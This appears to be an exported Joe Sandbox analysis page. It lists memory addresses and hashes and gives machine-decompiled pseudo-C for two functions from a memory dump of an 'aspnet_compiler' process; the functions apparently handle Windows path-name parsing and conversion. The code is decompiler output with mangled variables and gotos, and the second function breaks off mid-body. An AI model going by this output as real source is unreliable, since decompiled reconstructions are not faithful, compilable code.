0x011a5c2c
0x011a5c32
0x011a5c3a
0x011a5c3f
0x011a5c42
0x011a5c48
0x011a5c5b
0x011a5c5b
0x011a5c2c
0x011a5cb7
0x011a5cb9
0x011a5cbf
0x011a5cc2
0x011a5cca
0x011a5ccb
0x011a5ccb
0x011a5cd1
0x011a5cd7
0x011a5cda
0x011a5ce1
0x011a5ce4
0x011a5ce7
0x011a5ced
0x011a5cf3
0x011a5cf9
0x011a5cff
0x011a5d08
0x011a5d0a
0x011a5d0e
0x011a5d10
0x00000000
0x00000000
0x011a5d16
0x011a5d1a
0x00000000
0x00000000
0x011a5d20
0x011a5d22
0x011a5d25
0x011a5d2f
0x011a5d2f
0x011a5d33
0x011a5d3d
0x011a5d49
0x011a5d4b
0x00000000
0x00000000
0x011a5d5a
0x011a5d5d
0x011a5d60
0x00000000
0x00000000
0x011a5d66
0x011a5d69
0x00000000
0x00000000
0x011a5d6f
0x011a5d6f
0x011a5d73
0x011a5d79
0x011a5d7f
0x011a5d86
0x011a5d95
0x011a5d98
0x011a5dba
0x011a5dcb
0x011a5dce
0x011a5dd3
0x011a5dd6
0x011a5dd8
0x011a5de6
0x011a5dec
0x011a5dee
0x011a5df1
0x011a5df3
0x011a635a
0x011a635a
0x00000000
0x011a635a
0x011a5dfe
0x011a5e02
0x011a5e05
0x011a5e07
0x011a5e10
0x011a5e13
0x011a5e1b
0x011a5e1c
0x011a5e21
0x011a5e22
0x011a5e23
0x011a5e25
0x011a5e2a
0x011a5e2c
0x011a5e2e
0x011a5e36
0x011a5e39
0x011a5e42
0x011a5e47
0x011a5e4d
0x011a5e54
0x011a5e54
0x011a5e54
0x011a5e2e
0x011a5e5c
0x011a5e5f
0x011a5e62
0x011a5e64
0x011a5e6b
0x011a5e70
0x011a5e7a
0x011a5e7a
0x011a5e7a
0x011a5e6b
0x011a5e7e
0x011a5e7f
0x011a5e7f
0x011a5e81
0x011a5e87
0x011a5e8b
0x011a5e8c
0x011a5e8c
0x011a5e8c
0x011a5e9a
0x011a5e9c
0x011a5ea2
0x011a5ea6
0x011a5f50
0x011a5f50
0x011a5f57
0x011a5f66
0x011a5f66
0x011a5f66
0x011a5f68
0x011a5f6a
0x011a63d0
0x00000000
0x011a5f70
0x011a5f70
0x011a5f91
0x011a5f9c
0x011a5f9e
0x011a5fa4
0x011a5fa6
0x011a638c
0x011a6392
0x011a63a1
0x011a63a7
0x011a63af
0x011a63af
0x011a63bd
0x011a63d8
0x00000000
0x011a63d8
0x011a5fac
0x011a5fb2
0x011a5fb4
0x011a5fbd
0x011a5fc6
0x011a5fce
0x011a5fd4
0x011a5fdc
0x011a5fec
0x011a5fed
0x011a5fee
0x011a5fef
0x011a5ff9
0x011a5ffa
0x011a5ffb
0x011a5ffc
0x011a6000
0x011a6004
0x011a6012
0x011a6012
0x011a6018
0x011a6019
0x011a601a
0x011a601b
0x011a601c
0x011a6020
0x011a6059
0x011a605c
0x011a6061
0x011a6061
0x011a6022
0x011a6022
0x011a6022
0x011a6025
0x011a602a
0x011a602b
0x011a6031
0x011a6037
0x011a6038
0x011a603e
0x011a6048
0x011a6049
0x011a604a
0x011a604b
0x011a604c
0x011a604d
0x011a6053
0x011a6054
0x011a6054
0x011a6062
0x011a6065
0x011a6067
0x011a606a
0x011a6070
0x011a6075
0x011a6076
0x011a6081
0x011a6087
0x011a6095
0x011a6099
0x011a609e
0x011a60a4
0x011a60ae
0x011a60b0
0x011a60b3
0x011a60b6
0x011a60b8
0x011a60ba
0x011a60ba
0x011a60ba
0x011a60ba
0x011a60be
0x011a60c0
0x011a60c5
0x011a60c5
0x011a60c5
0x011a60c6
0x011a60cd
0x011a6114
0x011a60cf
0x011a60cf
0x011a60d4
0x011a60d5
0x011a60da
0x011a60db
0x011a60e1
0x011a60e2
0x011a60e8
0x011a60f8
0x011a60fd
0x011a60fe
0x011a6102
0x011a6104
0x011a6107
0x011a6109
0x011a610b
0x011a610b
0x011a610b
0x011a610b
0x011a610f
0x011a610f
0x011a6117
0x011a611a
0x011a611f
0x011a6125
0x011a6134
0x011a6139
0x011a613f
0x011a6146
0x011a6148
0x011a614b
0x011a614d
0x011a614f
0x011a614f
0x011a614f
0x011a614f
0x011a6153
0x011a6159
0x011a6159
0x011a615c
0x011a6163
0x011a6169
0x011a616c
0x011a6172
0x011a6181
0x011a6186
0x011a6187
0x011a618b
0x011a6191
0x011a6195
0x011a61a3
0x011a61bb
0x011a61c0
0x011a61c3
0x011a61cc
0x011a61d0
0x011a61dc
0x011a61de
0x011a61e1
0x011a61e4
0x011a61e6
0x011a61e8
0x011a61e8
0x011a61e8
0x011a61e8
0x011a61e6
0x011a61ec
0x011a61f3
0x011a6203
0x011a6209
0x011a620a
0x011a6216
0x011a621d
0x011a6227
0x011a6241
0x011a6246
0x011a624c
0x011a6257
0x011a6259
0x011a625c
0x011a625e
0x011a6260
0x011a6260
0x011a6260
0x011a6260
0x011a625e
0x011a6264
0x011a6267
0x011a6269
0x011a6315
0x011a6315
0x011a631b
0x011a631e
0x011a6324
0x011a6327
0x011a632f
0x011a6330
0x011a6333
0x011a633a
0x011a633c
0x011a6335
0x011a6335
0x011a6335
0x011a633f
0x011a6342
0x011a634c
0x011a6352
0x011a6355
0x011a6355
0x011a6359
0x00000000
0x011a626f
0x011a6275
0x011a6275
0x011a6278
0x011a627e
0x011a627e
0x011a6281
0x011a6287
0x011a628d
0x011a6298
0x011a629c
0x011a62a2
0x011a629e
0x011a629e
0x011a629e
0x011a62a7
0x011a62a7
0x011a62aa
0x011a62b0
0x011a62f0
0x011a62f0
0x011a62f2
0x011a62f8
0x011a62fd
0x011a62b2
0x011a62b2
0x011a62b2
0x011a62b5
0x011a62dd
0x011a62e2
0x011a62e5
0x011a62b7
0x011a62b8
0x011a62bb
0x011a62bd
0x011a62c0
0x011a62c4
0x011a62cd
0x011a62cd
0x011a62c0
0x011a62bb
0x011a62b5
0x011a6302
0x011a6303
0x011a6305
0x011a6305
0x011a6305
0x011a630c
0x011a630c
0x00000000
0x011a627e
0x011a6269
0x011a5eac
0x011a5ebb
0x011a5ebe
0x011a5ecb
0x011a5ecb
0x011a5ece
0x011a5ece
0x011a5ed4
0x011a5ed7
0x011a5ed9
0x011a5edb
0x011a5edb
0x011a5ee1
0x011a5ee1
0x011a5ee3
0x011a5f20
0x011a5f20
0x011a5ee5
0x011a5ee5
0x011a5ee5
0x011a5ee8
0x011a5f11
0x011a5f18
0x011a5eea
0x011a5eea
0x011a5eed
0x011a5ef2
0x011a5ef8
0x011a5efb
0x011a5f0a
0x011a5f0a
0x011a5eed
0x011a5ee8
0x011a5f22
0x011a5f28
0x00000000
0x00000000
0x011a5f30
0x011a5f31
0x011a5f37
0x011a5f3a
0x011a5f3d
0x011a5f44
0x00000000
0x00000000
0x00000000
0x011a5f46
0x011a5f48
0x011a5f4d
0x00000000
0x011a5f4d
0x011a5dda
0x011a5ddf
0x00000000
0x011a5ddf
0x011a5dd8
0x011a5da7
0x011a5da9
0x011a5dac
0x011a5dae
0x00000000
0x011a5db4
0x011a5db4
0x00000000
0x011a5db4
0x011a5dae
0x011a5d88
0x011a5d8d
0x011a6363
0x011a6369
0x011a636a
0x011a6370
0x011a6372
0x011a637a
0x011a637b
0x011a637d
0x00000000
0x00000000
0x011a637f
0x011a6385
0x00000000
0x011a6385
0x011a5d38
0x011a5d3b
0x00000000
0x00000000
0x00000000
0x011a5d3b
0x011a5d27
0x011a5d29
0x00000000
0x00000000
0x00000000
0x011a6360
0x00000000
0x011a6360
0x011a5c10
0x011a5c10
0x011a63da
0x011a63e5
0x011a63e5

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e53a24e0e7f3a7a35706ba49e67153fb92554b32e6ec5e184d5a6e2238767f
Instruction ID: 6ab7576f89f1f2040c1401bc37db813434b4b0b11a71873b5a5d0081f46ee99f
Opcode Fuzzy Hash: 91e53a24e0e7f3a7a35706ba49e67153fb92554b32e6ec5e184d5a6e2238767f
Instruction Fuzzy Hash: CF426B79904229CFDB68CF68C880BA9FBB1FF45304F5981AAD94DEB242D7349985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 010F4120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E010F4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x11cd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0110F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E010F6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L010F4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E010F6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M010F45F8))) {
												case 0:
													_v568 = 0x10b1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x10b11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L010F4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0111F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0111F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E010D52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E010EEB70(1, 0x11c79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E010EAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E011195D0();
																			L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0111B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01113D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0111B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x010f4128
0x010f4135
0x010f413c
0x010f4141
0x010f4145
0x010f4147
0x010f414e
0x010f4151
0x010f4159
0x010f415c
0x010f4160
0x010f4164
0x010f4168
0x010f416c
0x010f417f
0x010f4181
0x010f446a
0x010f446a
0x010f418c
0x010f4195
0x010f4199
0x010f4432
0x010f4439
0x010f443d
0x010f4442
0x010f4447
0x00000000
0x010f419f
0x010f41a3
0x010f41b1
0x010f41b9
0x010f41bd
0x010f45db
0x010f45db
0x00000000
0x010f41c3
0x010f41c3
0x010f41ce
0x010f41d4
0x0113e138
0x0113e13e
0x0113e169
0x0113e16d
0x0113e19e
0x0113e16f
0x0113e16f
0x0113e175
0x0113e179
0x0113e18f
0x0113e193
0x00000000
0x0113e199
0x00000000
0x0113e199
0x0113e193
0x00000000
0x00000000
0x00000000
0x010f41da
0x010f41da
0x010f41df
0x010f41e4
0x010f41ec
0x010f4203
0x010f4207
0x0113e1fd
0x010f4222
0x010f4226
0x0113e1f3
0x0113e1f3
0x010f422c
0x010f422c
0x010f4233
0x0113e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x010f4239
0x010f4239
0x010f4239
0x010f4239
0x010f4233
0x010f4226
0x010f41ee
0x010f41ee
0x010f41f4
0x010f4575
0x0113e1b1
0x0113e1b1
0x00000000
0x010f457b
0x010f457b
0x010f4582
0x0113e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x010f4588
0x010f4588
0x010f458c
0x0113e1c4
0x0113e1c4
0x00000000
0x010f4592
0x010f4592
0x010f4599
0x0113e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x010f459f
0x010f459f
0x010f45a3
0x0113e1d7
0x0113e1e4
0x00000000
0x010f45a9
0x010f45a9
0x010f45b0
0x0113e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x010f45b6
0x010f45b6
0x010f45b6
0x00000000
0x010f45b6
0x010f45b0
0x010f45a3
0x010f4599
0x010f458c
0x010f4582
0x00000000
0x00000000
0x00000000
0x00000000
0x010f41f4
0x010f423e
0x010f4241
0x010f45c0
0x010f45c4
0x00000000
0x010f45ca
0x010f45ca
0x00000000
0x0113e207
0x0113e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x010f45d1
0x00000000
0x00000000
0x010f45ca
0x00000000
0x010f4247
0x010f4247
0x010f4247
0x010f4249
0x010f4249
0x010f4249
0x010f4251
0x010f4251
0x010f4257
0x010f425f
0x010f426e
0x010f4270
0x010f427a
0x0113e219
0x0113e219
0x010f4280
0x010f4282
0x010f4456
0x010f45ea
0x00000000
0x010f45f0
0x0113e223
0x00000000
0x0113e223
0x010f445c
0x010f445c
0x00000000
0x010f445c
0x00000000
0x010f4288
0x010f428c
0x0113e298
0x010f4292
0x010f4292
0x010f429e
0x010f42a3
0x010f42a7
0x010f42ac
0x0113e22d
0x010f42b2
0x010f42b2
0x010f42b9
0x010f42bc
0x010f42c2
0x010f42ca
0x010f42cd
0x010f42cd
0x010f42d4
0x010f433f
0x010f433f
0x010f42d6
0x010f42d6
0x010f42d9
0x010f42dd
0x010f42eb
0x0113e23a
0x010f42f1
0x010f4305
0x010f430d
0x010f4315
0x010f4318
0x010f431f
0x010f4322
0x010f432e
0x010f433b
0x010f433b
0x00000000
0x010f432e
0x010f42eb
0x010f434c
0x010f434e
0x010f4352
0x010f4359
0x010f435e
0x010f4361
0x010f436e
0x010f438a
0x010f438e
0x010f4396
0x010f439e
0x010f43a1
0x010f43ad
0x010f43bb
0x010f43bb
0x010f43ad
0x010f436e
0x010f43bf
0x010f43c5
0x010f4463
0x010f4463
0x010f43ce
0x010f43d5
0x010f43d9
0x010f43df
0x010f4475
0x010f4479
0x010f4491
0x010f4491
0x010f4479
0x010f43e5
0x010f43eb
0x010f43f4
0x010f43f6
0x010f43f9
0x010f43fc
0x010f43ff
0x010f44e8
0x010f44ed
0x010f44f3
0x0113e247
0x00000000
0x010f44f9
0x010f4504
0x010f4508
0x010f450f
0x0113e269
0x00000000
0x010f4515
0x010f4519
0x010f4531
0x010f4534
0x010f4537
0x010f453e
0x010f4541
0x010f454a
0x0113e255
0x0113e255
0x0113e25b
0x0113e25e
0x0113e261
0x0113e261
0x010f4555
0x010f4559
0x010f455d
0x0113e26d
0x0113e270
0x0113e274
0x0113e27a
0x0113e27d
0x0113e28e
0x0113e28e
0x010f4563
0x010f4563
0x010f4569
0x010f4569
0x00000000
0x010f455d
0x010f450f
0x00000000
0x010f44f3
0x010f43ff
0x010f4405
0x010f4405
0x010f4405
0x010f42ac
0x010f428c
0x010f4282
0x010f4407
0x010f440d
0x0113e2af
0x0113e2af
0x010f4413
0x010f4413
0x00000000
0x010f41d4
0x00000000
0x010f41c3
0x010f41bd
0x010f4415
0x010f4415
0x010f4416
0x010f4417
0x010f4429
0x010f416e
0x010f416e
0x010f4175
0x010f4498
0x010f449f
0x0113e12d
0x00000000
0x0113e133
0x00000000
0x0113e133
0x010f44a5
0x010f44a5
0x010f44aa
0x00000000
0x010f44bb
0x010f44ca
0x010f44d6
0x010f44d7
0x010f44d8
0x010f44e3
0x010f44e3
0x010f44aa
0x010f417b
0x010f417b
0x010f417b
0x00000000
0x010f417b
0x010f4175
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6566fb56cc4a25a02efe9de61a4a801fe0f6046419b5acaf0692701f50e53fbb
Instruction ID: 4052fa2cbfb64215f7f3997a5971b45c0a27e0a97756d7ec5c57ffa94c919f7c
Opcode Fuzzy Hash: 6566fb56cc4a25a02efe9de61a4a801fe0f6046419b5acaf0692701f50e53fbb
Instruction Fuzzy Hash: 7BF17A746083118BD768CF19C481A7BB7E1EF88714F44896EFAC6CB651E734D885CB52

Uniqueness

Uniqueness Score: -1.00%

Function 011020A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E011020A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x11c8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01102EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01102EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E010D58EC(_t240);
									_t221 =  *0x11c5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x11c5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
